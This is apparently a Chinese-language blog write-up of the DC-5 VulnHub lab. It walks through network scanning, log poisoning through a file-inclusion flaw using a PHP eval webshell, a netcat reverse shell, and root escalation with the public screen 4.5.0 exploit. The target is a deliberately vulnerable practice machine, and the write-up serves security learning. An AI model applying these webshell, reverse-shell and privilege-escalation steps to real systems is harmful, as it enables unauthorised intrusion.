DC-5靶场 – JingY小窝

下载靶场

https://www.vulnhub.com/entry/dc-5,314/#download

建议使用kali，自带很多工具

首先使用VM将下载好的文件DC-5.ova打开

点击设置，将网络模式改为nat模式

运行虚拟机

该图是运行成功后的样子
这里未知的账号和密码，所以不进行登录，ip也就不知道，需要自己进行探测，但是网段在前面的nat模式得知网段为：192.168.43.0/24

现在打开攻击机：kali(可以是别的，这里图方便所以直接安装的kali)

第一步当然是对ip的探测，需要找到靶机的具体ip
由于是nat模式
所以直接查看攻击机的网络然后对该网段进行探测

ifconfig

现在已知网段是192.168.43.0/24

对网段探测
两种方式：

nmap -sP 192.168.43.0/24

arp-scan -l

对扫描结果进行分析：
192.168.43.1 VM8网卡
192.168.43.2 网关
192.168.43.5 目标机
192.168.43.6 攻击机
192.168.43.254 DHCP服务器

使用nmap扫描活端口

nmap -A -p- -v 192.168.43.5

由图可知开放了
80端口：存在web服务，nginx 1.6.2
111端口：rpcbind 2-4
42346端口：未知

那么先进入web服务看看有什么东西，但是在这里发现攻击机不能访问该服务，拿主机尝试发现能访问......

emmmm，那就先拿主机用着吧，全部点开看看有什么，发现有个Contact，可以上传信息，看看能不能是xss

emmm

可能是存储型？但是也不知道存到哪里了？
不过,,,在第二次提交的时候发现了一个异常点

日期变了！！！
所以这里想着为什么会变？
先扫描一下目录看看有什么东西吧

dirb http://192.168.43.5

然后发现感觉还是没什么东西
由于dirb只是简单的目录扫描，快一些，故而想试试看的，但是没扫到有用东西那就只能换个dirsearch重新扫一遍了

dirsearch -u http://192.168.43.5

还得是dirsearch 好用啊
那么进行分析目录，由于上面发现时间在变，所以果断看一手footer.php

欸？这个？是？页面底部的时间？那么就是文件包含咯？
bp抓包测试一下

看看能不能查看/etc/passwd

emmmm,意料之中的失败了
思考一下为什么会失败？
如果页面有文件包含的话，且已知footer.php文件是刷新会变得，那么在刷新后底部时间发生变化的页面就应该是文件包含了
刚才发生时间变化的页面是thankyou.php
重新试一下

成功，但是没有可以登录使用的
那么尝试一下能不能传个shell
直接一句话木马    <?php @eval($_POST['shell']);?>

由于前面得知该web服务是nginx1.6.2
所以日志很可能是默认未知：/var/log/nginx/error.log
访问看看先

日志目录没变且一句话木马成功存入日志
蚁剑连接

成功连接但是被火绒给阻止了

找了一圈，最后关了防护，当然也可以进行添加白名单

连接成功，下一步kali 监听

nc -lvnp 4444

蚁剑 nc 的ip是攻击机的，端口可以改成别的，但是要一致

成功监听
下一步反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'

先查找有suid的文件

find / -perm -u=s -type f 2>/dev/null

这里遇到了一个特殊的screen-4.5.0
搜索引擎看一下这个是窗口管理器的命令行界面版本。提供统一的管理多个会话的界面和相应的功能。
那么看看漏洞库里面有没有这个的漏洞

searchsploit screen 4.5.0

先看第一个
复制到桌面上
然后查看

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

cat 41154.sh

按照流程进行

创建目录: mkdir 05
切换目录：cd 05
创建文本：touch libhax.c
创建文本：touch rootshell.c
创建文本：touch dc5.sh

编写libhax.c
vim libhax.c

编译

 gcc -fPIC -shared -ldl -o ./libhax.so ./libhax.c

编写rootshell.c
vim rootshell.c

编译

gcc -o ./rootshell ./rootshell.c

编写dc5.sh

现在目录里应该是五个文本，当然也可以是三个，以为在说明文档里是要进行对.c文件的删除，也就是那两行rm -rf 但是这里没有进行删除

最后打包，传入蚁剑的tmp目录下

五个都存入或者除却.c的三个存入就好

回到kali 反弹的shell
切换到tmp目录下
给dc5.sh权限

cd /tmp
chmod 777 dc5.sh

运行dc5.sh

./dc5.sh

查看当前用户

whoami

提权失败，看看注释，版本问题出错，应该是靶机内没有这么高的版本：GLIBC_2.34
验证一下，查看靶机的版本

strings /lib/x86_64-linux-gnu/libc.so.6 | grep GLIBC_

很好，那就在靶机里编译rootshell.c文本吧，正好上面五个文本都传进去了

但是又遇到问题了，之前的文件无法删除，因为没有权限啊，不管是蚁剑还是反弹shell都无法删除，难崩，以后再写脚本的时候一定先看看靶机的shell啊！！！
那么怎么解决呢？看看能不能重新编写个脚本吧

三个脚本都看了一下,文本替换
rootshell -> rts
libhax -> lix
dc5.sh -> d5.sh
脚本里面的内容也需要对应的更改

将三个文件都传入靶机

在反弹shell中进行编译

这里一定要写对命令别写错
cd /tmp
gcc -fPIC -shared -ldl -o ./lix.so ./lix.c  
gcc -o ./rts ./rts.c
chmod 777 d5.sh
./d5.sh

whoami

成功提权
flag啥的就不看了哈

用到的呃：
靶机：DC-5
攻击机：kali
具体安全软件：NMAP ,NC ,dirsearch , 蚁剑，searchsploit
涉及操作：ip探测，端口扫描，信息搜集，目录扫描，日志shell，监听，反弹shell交互，poc复现，提权